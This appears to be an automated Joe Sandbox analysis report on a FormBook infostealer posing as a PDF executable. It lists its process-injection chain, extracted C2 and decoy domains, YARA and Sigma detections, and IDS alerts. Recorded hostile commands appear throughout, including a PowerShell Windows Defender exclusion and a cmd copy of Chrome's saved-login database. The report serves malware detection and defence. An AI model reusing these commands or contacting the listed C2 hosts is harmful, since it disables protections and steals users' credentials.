Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Specification and Quantity Pdf.exe

Overview

General Information

Sample name:Specification and Quantity Pdf.exe
Analysis ID:1515401
MD5:686fed0af9eebb2581701d4e08e9ff0b
SHA1:3c9f400ba8c6fe7f35f20bca09e59d3bb8169035
SHA256:219a330b7ae9807411d289f28169861fc748f50212ae2317278bfe155d89990f
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected FormBook malware
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Rundll32 Execution Without CommandLine Parameters
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potential Browser Data Stealing
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Use Short Name Path in Command Line
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Specification and Quantity Pdf.exe (PID: 7692 cmdline: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe" MD5: 686FED0AF9EEBB2581701D4E08E9FF0B)
    • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7812 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 8096 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • svchost.exe (PID: 7924 cmdline: "C:\Windows\System32\svchost.exe" MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • wmplayer.exe (PID: 7956 cmdline: "C:\Program Files (x86)\Windows Media Player\wmplayer.exe" MD5: A7790328035BBFCF041A6D815F9C28DF)
      • explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • rundll32.exe (PID: 8156 cmdline: "C:\Windows\SysWOW64\rundll32.exe" MD5: 889B99C52A60DD49227C5E485A016679)
          • cmd.exe (PID: 1352 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 6524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • firefox.exe (PID: 6192 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
{"C2 list": ["www.playdoapp.online/n7ak/"], "decoy": ["wise-transfer.info", "jam-nins.com", "thebestsocialcrm.com", "majomeow222.com", "ancientshadowguilt.space", "gentleman-china.com", "parquemermoz.store", "taxuw.com", "sharqiyapaints.com", "libraryofkath.com", "1949wan.com", "synqr.net", "bitchessgirls.com", "btonu.cfd", "coding-bootcamps-16314.com", "leadership22-tdh.site", "maximsboutique.com", "irishsummertruffles.com", "sdnaqianchuan.com", "uyews.xyz", "mostvisitors.com", "prembug.com", "lebondtrip.com", "villavouno.com", "solanosotostudio.com", "pbx1.website", "littleeturtle.com", "supremeajock.biz", "turborings.run", "parkpeninsula.online", "goodstuff.tv", "17qld.com", "thehandycrewcompany.com", "alwaystuesdaytacos.com", "entribeworks.com", "susanboyleinfo.com", "volkovastyu.com", "tradingmoja.com", "germancompany-eg.com", "gameofgem.com", "hbdpcq.com", "budsdesigns.com", "sistemrizal.xyz", "395boulderbrookdr.com", "forounlock.com", "cp2967.com", "creatividadymedia.com", "marocquadchallenge.com", "tuktukwines.com", "tripskorea.com", "eyvonnesewingshop.com", "1690.biz", "perfectkick.website", "jreengineering.tech", "lilmeow.store", "ttjsdispatchingllc.com", "carltonellis.com", "redantholdings.com", "luxuryworkingfarms.com", "appsecintelligence.com", "studmate.online", "imogenbot.store", "netheerlandart.com", "bikelegalkentucky.com"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 40 entries
      SourceRuleDescriptionAuthorStrings
      5.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cba0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          5.2.svchost.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c90a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          5.2.svchost.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x18819:$sqlite3step: 68 34 1C 7B E1
          • 0x1892c:$sqlite3step: 68 34 1C 7B E1
          • 0x18848:$sqlite3text: 68 38 2A 90 C5
          • 0x1896d:$sqlite3text: 68 38 2A 90 C5
          • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 25 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe", ParentImage: C:\Users\user\Desktop\Specification and Quantity Pdf.exe, ParentProcessId: 7692, ParentProcessName: Specification and Quantity Pdf.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 7812, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\SysWOW64\rundll32.exe", CommandLine: "C:\Windows\SysWOW64\rundll32.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\Explorer.EXE, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 4056, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ProcessId: 8156, ProcessName: rundll32.exe
          Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 8156, ParentProcessName: rundll32.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, ProcessId: 1352, ProcessName: cmd.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe", ParentImage: C:\Users\user\Desktop\Specification and Quantity Pdf.exe, ParentProcessId: 7692, ParentProcessName: Specification and Quantity Pdf.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 7812, ProcessName: powershell.exe
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe", ParentImage: C:\Users\user\Desktop\Specification and Quantity Pdf.exe, ParentProcessId: 7692, ParentProcessName: Specification and Quantity Pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7924, ProcessName: svchost.exe
          Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 8156, ParentProcessName: rundll32.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, ProcessId: 1352, ProcessName: cmd.exe
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe", ParentImage: C:\Users\user\Desktop\Specification and Quantity Pdf.exe, ParentProcessId: 7692, ParentProcessName: Specification and Quantity Pdf.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 7812, ProcessName: powershell.exe
          Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Specification and Quantity Pdf.exe", ParentImage: C:\Users\user\Desktop\Specification and Quantity Pdf.exe, ParentProcessId: 7692, ParentProcessName: Specification and Quantity Pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 7924, ProcessName: svchost.exe

          Stealing of Sensitive Information

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\rundll32.exe", ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 8156, ParentProcessName: rundll32.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V, ProcessId: 1352, ProcessName: cmd.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-22T17:27:13.393340+020020314531Malware Command and Control Activity Detected192.168.2.74971323.227.38.7480TCP
          2024-09-22T17:29:39.690092+020020314531Malware Command and Control Activity Detected192.168.2.74971678.46.88.14080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-09-22T17:27:13.456161+020028290041Malware Command and Control Activity Detected192.168.2.74971423.227.38.7480TCP
          2024-09-22T17:28:14.376902+020028290041Malware Command and Control Activity Detected192.168.2.749715203.161.60.19180TCP
          2024-09-22T17:29:41.658867+020028290041Malware Command and Control Activity Detected192.168.2.74971778.46.88.14080TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://www.taxuw.com/n7ak/www.jam-nins.comAvira URL Cloud: Label: malware
          Source: http://www.supremeajock.biz/n7ak/www.1690.bizAvira URL Cloud: Label: malware
          Source: http://www.maximsboutique.com/n7ak/www.tuktukwines.comAvira URL Cloud: Label: malware
          Source: http://www.supremeajock.biz/n7ak/Avira URL Cloud: Label: malware
          Source: http://www.maximsboutique.comAvira URL Cloud: Label: malware
          Source: http://www.maximsboutique.com/n7ak/Avira URL Cloud: Label: malware
          Source: http://www.taxuw.com/n7ak/Avira URL Cloud: Label: malware
          Source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.playdoapp.online/n7ak/"], "decoy": ["wise-transfer.info", "jam-nins.com", "thebestsocialcrm.com", "majomeow222.com", "ancientshadowguilt.space", "gentleman-china.com", "parquemermoz.store", "taxuw.com", "sharqiyapaints.com", "libraryofkath.com", "1949wan.com", "synqr.net", "bitchessgirls.com", "btonu.cfd", "coding-bootcamps-16314.com", "leadership22-tdh.site", "maximsboutique.com", "irishsummertruffles.com", "sdnaqianchuan.com", "uyews.xyz", "mostvisitors.com", "prembug.com", "lebondtrip.com", "villavouno.com", "solanosotostudio.com", "pbx1.website", "littleeturtle.com", "supremeajock.biz", "turborings.run", "parkpeninsula.online", "goodstuff.tv", "17qld.com", "thehandycrewcompany.com", "alwaystuesdaytacos.com", "entribeworks.com", "susanboyleinfo.com", "volkovastyu.com", "tradingmoja.com", "germancompany-eg.com", "gameofgem.com", "hbdpcq.com", "budsdesigns.com", "sistemrizal.xyz", "395boulderbrookdr.com", "forounlock.com", "cp2967.com", "creatividadymedia.com", "marocquadchallenge.com", "tuktukwines.com", "tripskorea.com", "eyvonnesewingshop.com", "1690.biz", "perfectkick.website", "jreengineering.tech", "lilmeow.store", "ttjsdispatchingllc.com", "carltonellis.com", "redantholdings.com", "luxuryworkingfarms.com", "appsecintelligence.com", "studmate.online", "imogenbot.store", "netheerlandart.com", "bikelegalkentucky.com"]}
          Source: www.jam-nins.comVirustotal: Detection: 11%Perma Link
          Source: volkovastyu.comVirustotal: Detection: 5%Perma Link
          Source: www.supremeajock.bizVirustotal: Detection: 5%Perma Link
          Source: www.1690.bizVirustotal: Detection: 6%Perma Link
          Source: www.maximsboutique.comVirustotal: Detection: 7%Perma Link
          Source: www.parkpeninsula.onlineVirustotal: Detection: 7%Perma Link
          Source: www.playdoapp.onlineVirustotal: Detection: 10%Perma Link
          Source: http://www.tuktukwines.com/n7ak/www.playdoapp.onlineVirustotal: Detection: 5%Perma Link
          Source: http://www.gameofgem.com/n7ak/Virustotal: Detection: 5%Perma Link
          Source: http://www.playdoapp.online/n7ak/Virustotal: Detection: 8%Perma Link
          Source: http://www.thehandycrewcompany.comVirustotal: Detection: 8%Perma Link
          Source: http://www.jam-nins.com/n7ak/www.sdnaqianchuan.comVirustotal: Detection: 14%Perma Link
          Source: http://www.1690.bizVirustotal: Detection: 6%Perma Link
          Source: http://www.parkpeninsula.onlineVirustotal: Detection: 7%Perma Link
          Source: http://www.jam-nins.comVirustotal: Detection: 11%Perma Link
          Source: http://www.playdoapp.onlineVirustotal: Detection: 10%Perma Link
          Source: C:\Users\user\Specification and Quantity Pdf.exeReversingLabs: Detection: 65%
          Source: Specification and Quantity Pdf.exeVirustotal: Detection: 68%Perma Link
          Source: Specification and Quantity Pdf.exeReversingLabs: Detection: 65%
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Specification and Quantity Pdf.exe.26988f33988.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Specification and Quantity Pdf.exe.26988d99cf0.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000002.3748804420.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1377345707.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3751155179.0000000000D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1377647946.00000000037A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3751238251.0000000000DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.3749075404.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.1376936444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1309964008.0000026988C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: Specification and Quantity Pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: firefox.pdbP source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: wmplayer.exe, 00000006.00000003.1308686773.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.1311421220.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.0000000004470000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1377466502.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.000000000460E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1379009493.00000000042C5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: wmplayer.exe, wmplayer.exe, 00000006.00000003.1308686773.00000000034A7000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.0000000003800000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000003.1311421220.0000000003659000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377770159.000000000399E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.3751897007.0000000004470000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1377466502.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751897007.000000000460E000.00000040.00001000.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1379009493.00000000042C5000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: rundll32.pdb source: wmplayer.exe, 00000006.00000002.1377678931.00000000037D0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377431064.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, rundll32.exe, 0000000A.00000002.3751441685.0000000000E90000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: rundll32.pdbGCTL source: wmplayer.exe, 00000006.00000002.1377678931.00000000037D0000.00000040.10000000.00040000.00000000.sdmp, wmplayer.exe, 00000006.00000002.1377431064.00000000033AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000002.3751441685.0000000000E90000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wmplayer.pdbGCTL source: rundll32.exe, 0000000A.00000002.3749703001.00000000007E0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wmplayer.pdb source: rundll32.exe, 0000000A.00000002.3749703001.00000000007E0000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: firefox.pdb source: rundll32.exe, 0000000A.00000003.1506733519.0000000005643000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000A.00000003.1557665455.0000000005EF0000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 4x nop then push rdi0_2_00007FF773D34450
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 4x nop then push rdi0_2_00007FF773D30200
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 4x nop then push rbx0_2_00007FF773D0CC30
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 4x nop then push rbx0_2_00007FF773CDFAA0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF773D37A90
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 4x nop then sub rsp, 28h0_2_00007FF773CDF9C0
          Source: C:\Users\user\Desktop\Specification and Quantity Pdf.exeCode function: 4x nop then mov rax, rcx0_2_00007FF773CC9FC0
          Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 4x nop then pop edi6_2_00417D89
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi10_2_00356CB3
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4x nop then pop edi10_2_00357D89

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49713 -> 23.227.38.74:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49713 -> 23.227.38.74:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.7:49713 -> 23.227.38.74:80
